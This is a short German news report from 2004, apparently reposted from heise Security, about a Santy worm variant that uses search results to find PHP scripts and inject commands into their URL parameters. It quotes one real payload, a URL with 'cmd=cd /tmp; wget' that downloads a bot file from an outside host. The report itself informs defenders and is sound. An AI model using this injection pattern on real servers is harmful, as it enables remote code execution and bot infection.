Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
Neue Ausgabe von Hakin9 2/2004 (4)
Man in the middle - Angriff auf eine verschlüsselte Sitzung. Die häufigste Art und Weise, Informationen aus verschlüsselten SSL- bzw. SSH-Sitzungen abzufangen, ist der "Man in the middle"-Angriff. Wie Spam verschickt wird Erstellung von Shellcode für MS ...
Autor :
admin
Kategorie:
Software & Web-Development
LAMP kompakt auf dem Linux-Tag 2005
Unternehmen rund um die LAMP-Plattform präsentieren sich in Karlsruhe in der LAMP-Area Bereits zum zweiten Mal finden sich namhafte Anbieter, Projekte und Förderer der LAMP-Plattform auf dem Karlsruher Linux-Tag in einem gemeinsamen Bereich wieder. Vom ...
Autor :
admin
Kategorie:
Software & Web-Development
2. PHP Code Camp
Bald ist es wieder soweit: Das PHP Magazin und die Entwickler Akademie präsentieren das 2. PHP Code Camp vom 9. bis 12. Juni 2008 - diesmal in Berlin. Drei der bekanntesten PHP-Profis - Sebastian Bergmann, Arne Blankerts und Stefan Priebsch - werden Ihne ...
Autor :
admin
Kategorie:
Software & Web-Development
Bot registriert sich in mehreren tausend phpBB-Foren
Nachdem im Usenet bereits vor 14 Tagen auf einen phpBB-Bot hingewiesen wurde, der sich als Anwender mit dem Namen FuntKlakow registrierte, spekulieren nun weitere Foren und Blogs über seine Funktion und eine mögliche Vorbereitung eines großangelegten Angr ...
Autor :
admin
Kategorie:
Software & Web-Development
Microsoft - Internet Explorer 6.0 kommt ab Mittwoch
Nach bisher unbestätigten Gerüchten will Microsoft ab Mittwoch den Internet Explorer 6.0 in einer "Public Preview"-Version zum Download bereitstellen. ...
Autor :
admin
Kategorie:
Software & Web-Development
Bundesrat verabschiedet Gesetz gegen Dialer-Missbrauch
Im zweiten Anlauf am 11. Juli 2003 hat Das "Gesetz zur Bekämpfung des Missbrauchs von 0190er/0900er-Mehrwertdiensterufnummern" es im Bundesrat geschafft. am 20. Juni 2003 hatten sich CDU/CSU noch gegen das neue Verbraucherschutzgesetz entschieden; am 2. J ...
Autor :
admin
Kategorie:
Software & Web-Development